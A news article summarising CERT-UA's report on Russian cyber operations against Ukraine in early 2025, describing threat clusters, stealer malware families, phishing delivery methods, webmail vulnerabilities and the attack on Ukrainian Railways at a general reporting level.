Ukraine’s national cyber incident response team (CERT-UA) has released a comprehensive analytical report on Russian cyber operations during the first half of 2025.
According to CERT-UA, attacks against local government bodies have risen slightly, from 32% in the second half of 2024 to 34% in the first half of 2025. The defense sector also experienced an increase in attacks, growing from 19% to 23%. Interestingly, the number of cyber incidents targeting central government institutions and the energy sector decreased. Overall, experts observed a reduction in the spread of malware, phishing attempts, and account compromises.
As for active threats, the report details several cyber threat clusters active in early 2025, including groups tracked as UAC-0218, UAC-0219, UAC-0226, and UAC-0227, as well as ongoing campaigns orchestrated well-known threat actors like UAC-0001 (associated with APT28) and UAC-0002 (known as Sandworm or APT44) and its subclusters such as UAC-0125.
Experts note some shift in attackers’ behavior such as an adoption of the “Steal & Go” tactic, in which malicious scripts are designed to quickly extract data without maintaining long-term presence on compromised systems. It is possible that artificial intelligence may have been used to generate some of the PowerShell scripts employed in these operations, according to CERT-UA.
In terms of malware tools, UAC-0219 uses a stealer tool named ‘WRECKSTEEL’, which employs a chain of VBScript and PowerShell scripts to steal data by specific file extensions and capture screenshots that are then sent to attacker servers. Campaigns linked to UAC-0218 involve phishing emails containing password-protected Office documents and encoded scripts that deploy the HOMESTEEL malware, capable of recursively searching user files and exfiltrating them via HTTP protocols. Archives containing the malicious payloads have been hosted on legitimate Ukrainian file storage services.
From February 2025, the UAC-0226 cluster began distributing emails with Excel attachments containing macros that decode hidden base64-encoded files into executable payloads. The payloads include a reverse shell adapted from a public GitHub repository and a data stealer called ‘GIFTEDCROOK’, which extracts browser histories, saved credentials, and cookies, sending them to Telegram channels controlled by attackers.
Meanwhile, UAC-0227 has targeted local governments and critical infrastructure using innovative delivery methods, including emails with SVG image attachments that contain embedded HTML and JavaScript. Opening such files triggers a chain of events resulting in the execution of stealers like AMATERA and STRELA.
Attackers are increasingly using legitimate online services for hosting and delivering malicious content, CERT-UA notes. Another method of intrusion is the active exploitation of “zero-click” vulnerabilities in popular webmail platforms such as Roundcube and Zimbra.
The use of Roundcube vulnerabilities such as CVE-2023-43770 allow attackers to embed and execute malicious JavaScript directly within emails or attachments, enabling them to steal credentials, contacts, and set email forwarding rules to intercept communications stealthily.
Similarly, Zimbra’s Classic UI has been exploited through flaws related to calendar file processing, permitting attackers to run malicious scripts that harvest login data and configure forwarding filters. Some campaigns exploiting these vulnerabilities have been attributed to the UAC-0001 group with a high degree of confidence.
UAC-0002 (aka Sandworm and APT44) has continued its cyber operations in 2025, focusing on the energy sector, defense industrial organizations, telecommunication providers, and research institutions. CERT-UA notes a correlation between UAC-0002 cyberattacks and kinetic (physical) attacks in the same regions, suggesting coordinated or complementary efforts. One of the most disruptive incidents involved a cyberattack on Ukrzaliznytsia, the Ukrainian Railways. While the attack did not halt train operations, it forced several services, including ticket sales, to switch temporarily to offline modes. The operation, described as essentially terrorist in nature, employed custom malware and delivery methods tailored to the infrastructure of the enterprise.